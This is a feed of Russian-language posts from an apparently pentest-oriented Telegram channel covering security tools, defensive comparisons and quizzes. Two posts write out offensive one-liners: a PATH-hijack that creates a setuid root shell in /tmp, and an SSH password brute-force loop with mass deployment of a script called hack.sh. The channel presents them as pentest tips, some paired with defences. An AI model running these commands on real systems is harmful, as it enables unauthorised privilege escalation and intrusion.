Deep-dive, или когда обновиться недостаточно
Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.
⏺ В статье будет краткий чек-лист Deep-dive: верификация SCA, поиск первоисточников, оценка эксплуатируемости и практические обходы (конфиги, мониторинг, тестовая эксплуатация). Кейсы на Spring/Struts и Python показывают, как решать прям на практике.
ZeroDay | #Статья
Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤1🏆1
MyIP: универсальный чекер IP и сетевых связей
👋
⏺ MyIP - универсальный «чекер» всего, что связано с твоим IP: геолокация, DNS- и WebRTC-утечки, доступность сайтов, speed test, MTR и whois. Короче все в одном месте, без беготни по десятку сервисов.
⏺ Можно быстро проверить пинг до серверов по миру, доступность популярных сайтов и получить полную инфу по любому IPшнику.
⏺ Смотрим локально:
Или одной командой через Docker:
⏺ И финально, что еще есть классного: PWA, мобильный режим, тёмная тема, хоткеи и встроенный чек-лист по кибербезу даже 😎
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/jason5ng32/MyIP.git
cd MyIP
npm install && npm run build
npm start
Или одной командой через Docker:
docker run -d -p 18966:18966 --name myip jason5ng32/myip:latest
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12🤡5👍3❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
DLP vs CASB: что выбрать?
👋
⏺ DLP (Data Loss Prevention) - это как внутренний «охранник» компании. Следит, чтобы важные данные не улетели наружу: почта, флешки, копирование файлов. Помогает предотвратить случайные утечки или намеренные кражи инфы внутри компании. Главное, что DLP отлично работает внутри корпоративной сети, но с облачными сервисами и SaaS ограничений больше.
⏺ CASB (Cloud Access Security Broker) — такой «страж» облака. Контролирует доступ к SaaS, проверяет трафик, шифрует данные, ловит подозрительные действия и блокирует непонятные подключения. Он ориентирован на облачные сервисы, поэтому локальные файлы и устройства под его зоной действия не всегда.
ZeroDay | #CASB #DLP
Приветствую в мире цифровой безопасности!Разберем, что выбрать для защиты от утечек данных — DLP или CASB.ZeroDay | #CASB #DLP
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7❤🔥3👌2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Linux capabilities вместо SUID: SUID-бинарники - это старый трюк, но современные админы иногда забывают про capabilities.
➡️ Видите cap_net_admin или cap_setuid+ep? Вот теперь можно изучить бинарь и поднять права. Защита проста: убрать лишние capabilities и мониторить их появление.
⏺ PATH-hijack через cron или systemd: Если сервис запускает команды без полного пути — подкиньте свой бинар в каталог, который стоит раньше в PATH:
➡️ Защита: жёсткий PATH и абсолютные пути в unit-файлах и crontab, запрет на запись в системные каталоги.
⏺ SSH-agent forwarding & ProxyCommand для тихого pivot: Агент на цели может быть вашим тайным оружием: ключи остаются у вас, а доступ дальше можно получить через ProxyCommand/ProxyJump.
➡️ Защита: отключать агент-форвардинг (AllowAgentForwarding no) и следить за нестандартным SSH-трафиком.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.getcap -r / 2>/dev/null
echo -e '#!/bin/bash\ncp /bin/sh /tmp/rootsh && chmod +s /tmp/rootsh' > /tmp/backup
chmod +x /tmp/backup
export PATH=/tmp:$PATH
ssh-add -L # покажет ключи агента
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤5❤🔥1
ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤5
Криптопаразиты-снайперы: грабь награбленное‽
Биткоин-головоломки с «легкими» BTC казались простым выигрышем, пока не появились криптопаразиты, то есть хакеры, которые перебивают транзакции и забирают приз себе. Механика тут проста: транзакция раскрывает публичный ключ, а слабые кошельки позволяют быстро вычислить приватный и отправить свою транзакцию с более высокой комиссией.
⏺ В статье у нас краткий разбор: как перебивают транзакции, ускоряют ставки, используют PoC и тестовые скрипты, чтобы забрать награбленное. Кейсы на 6.6–6.9 BTC показывают, как паразиты действуют быстрее обычного юзера и почему нужно быть осторожным с «легкими» головоломками.
ZeroDay | #Статья
Биткоин-головоломки с «легкими» BTC казались простым выигрышем, пока не появились криптопаразиты, то есть хакеры, которые перебивают транзакции и забирают приз себе. Механика тут проста: транзакция раскрывает публичный ключ, а слабые кошельки позволяют быстро вычислить приватный и отправить свою транзакцию с более высокой комиссией.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍1
Что обычно используется для «pivoting» при внутреннем тестировании в разрешённой среде?
Anonymous Quiz
16%
Открытые SMB-шеры
48%
SSH/Socks прокси через скомпрометированный хост
18%
Подмена ARP на границе сети
18%
Смена VLAN без доступа к коммутатору
🔥12👍3❤1
afrog: сканер, который ускоряет пентест
👋
⏺ Что это: afrog - быстрый и стабильный сканер на Go. Пробегает встроенные PoC: CVE, CNVD, default-пароли, info-leak, RCE, arbitrary file read и многое другое. Можно добавлять свои PoC, а результаты сразу превращаются в аккуратный HTML-отчёт.
⏺ В чем удобство: мало ложных срабатываний, легко масштабируется на десятки сайтов, поддерживает фильтры по ключевым словам и уровню критичности, плюс JSON для CI/CD.
⏺ Глянем на практике:
Скан одного сайта:
Скан по списку:
⏺ Полезные флаги:
• -P <mypocs/> — свои PoC
• -s keyword1,keyword2 — поиск по ключевым словам
• -S high,critical — фильтр по серьёзности
• -json / -json-all — сохранить результаты в JSON
• -web — локальный веб-интерфейс для просмотра отчётов
⏺ Для сложных PoC: некоторые проверки требуют OOB (ceye, dnslog и др.). Первый запуск создаёт ~/.config/afrog/afrog-config.yaml — настройте секцию reverse и API ключи, чтобы все blind-RCE работали корректно.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/zan8in/afrog.git
cd afrog
go build cmd/afrog/main.go
./afrog -h
Скан одного сайта:
./afrog -t https://example.com
Скан по списку:
./afrog -T urls.txt
• -P <mypocs/> — свои PoC
• -s keyword1,keyword2 — поиск по ключевым словам
• -S high,critical — фильтр по серьёзности
• -json / -json-all — сохранить результаты в JSON
• -web — локальный веб-интерфейс для просмотра отчётов
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18🤨3👍1💘1
IP Spoofing: защита на сетевом уровне (Layer 3)
👋
⏺ Смысл атаки: хакер подменяет IP-адрес источника в пакетах, чтобы скрыть своё местоположение, обойти фильтры или направить трафик на жертву. Это классика для DDoS, MITM и обхода контроля доступа.
⏺ Покажу на практике:
1️⃣ Ingress/Egress Filtering: фильтруем пакеты на границах сети, чтобы трафик с «чужим» исходным IP просто не проходил.
Cisco:
Linux (iptables):
2️⃣ Reverse Path Filtering (uRPF): проверяем, что пакет пришёл по корректному маршруту. Если нет - DROP.
Linux:
3️⃣ Точечный мониторинг и alert-правила: следим за подозрительными исходящими пакетами. Даже если атака идёт изнутри сети, IDS сможет поднять тревогу. Например, Suricata правило:
ZeroDay | #Zeroday
Приветствую в мире цифровой безопасности!
В одном из прошлых постов разбирали типы спуфинг атак по уровням. Сейчас посмотрим, как защититься от одной из них.Cisco:
interface GigabitEthernet0/1
ip verify unicast source reachable-via rx
Linux (iptables):
iptables -A INPUT -s 192.168.0.0/16 -j ACCEPT
iptables -A INPUT -s 0.0.0.0/0 -j DROP
Linux:
echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
alert ip any any -> 192.168.0.0/16 any (msg:"Suspicious spoofed packet"; sid:100001;)
ZeroDay | #Zeroday
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤4
Какой метод атаки позволяет обойти DEP и ASLR, используя цепочки существующих инструкций в памяти?
Anonymous Quiz
26%
Heap Spraying
51%
Return-Oriented Programming (ROP)
15%
SQL Injection
9%
XSS
😢3
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для автоматизации атак
👋
⏺ Массовый пинг сети: Бывает, нет под рукой nmap, а нужно быстро понять, какие машины живы в подсети. Поможет простой цикл:
Одной строкой получаем список активных хостов.
⏺ Проверка открытых портов без nmap: То же самое можно сделать и с портами:
⏺ Автоподбор паролей через SSH: Мини-брут без Hydra - иногда работает на тестовых стендах:
⏺ Заливка скрипта на все машины: Рутинные действия можно автоматизировать одним циклом:
Так можно массово прогнать свой скрипт по списку хостов.
⏺ Сбор инфы с машин: Чтобы не заходить на каждый сервер отдельно:
ZeroDay | #bash
Приветствую в мире цифровой безопасности!
Давай расскажу о 5 фишках Bash, которые заметно ускорят пентест.for ip in 192.168.1.{1..254}; do ping -c1 -W1 $ip &>/dev/null && echo "$ip жив"; doneОдной строкой получаем список активных хостов.
for p in 22 80 443 3306; do (echo >/dev/tcp/192.168.1.10/$p) &>/dev/null && echo "порт $p открыт"; done
while read p; do sshpass -p "$p" ssh -o StrictHostKeyChecking=no user@host "echo успех с $p" && break; done < passlist.txt
for h in $(cat hosts.txt); do scp hack.sh $h:/tmp/; ssh $h "bash /tmp/hack.sh"; done
Так можно массово прогнать свой скрипт по списку хостов.
for h in $(cat hosts.txt); do echo "== $h =="; ssh $h "id; uname -a; df -h"; done
ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18👍6🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
EDR vs NDR: что выбрать и как их совместить?
👋
⏺ EDR (Endpoint Detection and Response) - можно сказать, что это, как охранник на каждом компьютере или сервере. Он фиксирует непонятные процессы, аномалии в поведении приложений и сразу реагирует. Можно юзать против локальных атак и вредоносов.
⏺ NDR (Network Detection and Response) - тут уже что-то вроде шпиона внутри сети. Он анализирует трафик, ищет аномальные соединения, подозрительные паттерны протоколов и нестандартное поведение, даже если конечные точки чистые.
⏺ Но лучше их комбинировать: EDR быстро блочит локальные угрозы, NDR ловит скрытые сетевые атаки и нетривиальные попытки обхода. Вместе они дают полный обзор и ускоряют расследование инцидентов.
ZeroDay | #EDR #NDR
Приветствую в мире цифровой безопасности!Расскажу, чем отличаются EDR и NDR. И можно ли их юзать совместно.ZeroDay | #EDR #NDR
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍3🌭1
Isolation Forest: как находить аномалии в данных
Аномалии - это не всегда очевидные выбросы: глобальные (резко отличающиеся точки), контекстные (необычные сочетания признаков) и коллективные (группы «нормальных» точек с аномальным паттерном). Isolation Forest ловит такие выбросы, создавая ансамбль деревьев и «изолируя» редкие наблюдения; каждая случайная выборка учится выявлять аномалии, а объединение моделей повышает точность.
⏺ В статье будет очень наглядное объяснение типов аномалий и как ансамбли деревьев Isolation Forest помогают их обнаружить, с примерами глобальных, контекстных и коллективных выбросов.
ZeroDay | #Статья
Аномалии - это не всегда очевидные выбросы: глобальные (резко отличающиеся точки), контекстные (необычные сочетания признаков) и коллективные (группы «нормальных» точек с аномальным паттерном). Isolation Forest ловит такие выбросы, создавая ансамбль деревьев и «изолируя» редкие наблюдения; каждая случайная выборка учится выявлять аномалии, а объединение моделей повышает точность.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤7👨💻3
dirsearch: сканер скрытых путей
👋
⏺ dirsearch - такой быстрый web path scanner, который помогает находить спрятанные директории и файлы на сайтах.
⏺ dirsearch брутфорсит пути по словарю и проверяет их доступность. Так можно найти забытые админки, бэкапы или тестовые файлы.
⏺ Что умеет: поддержка wordlist’ов, маскировка расширений (-e php,html,js), рекурсивное сканирование (-r), фильтрация по статусам и даже обход лимитов через прокси или Tor.
⏺ Как работает:
⏺ Результат, кстати, можно выгрузить в json, html или csv.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.# стандартный запуск
python3 dirsearch.py -u https://target -e php,html,js -w /path/to/wordlist -r -t 30
# скан с сохранением в отчёт (HTML)
python3 dirsearch.py -u https://target -w /path/to/wordlist --format=html -o report.html
# запуск через прокси
python3 dirsearch.py -u https://target -w /path/to/wordlist --proxy=http://127.0.0.1:8080
# ограничение по коду ответа (например, только 200)
python3 dirsearch.py -u https://target -w /path/to/wordlist --include-status=200
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚7❤5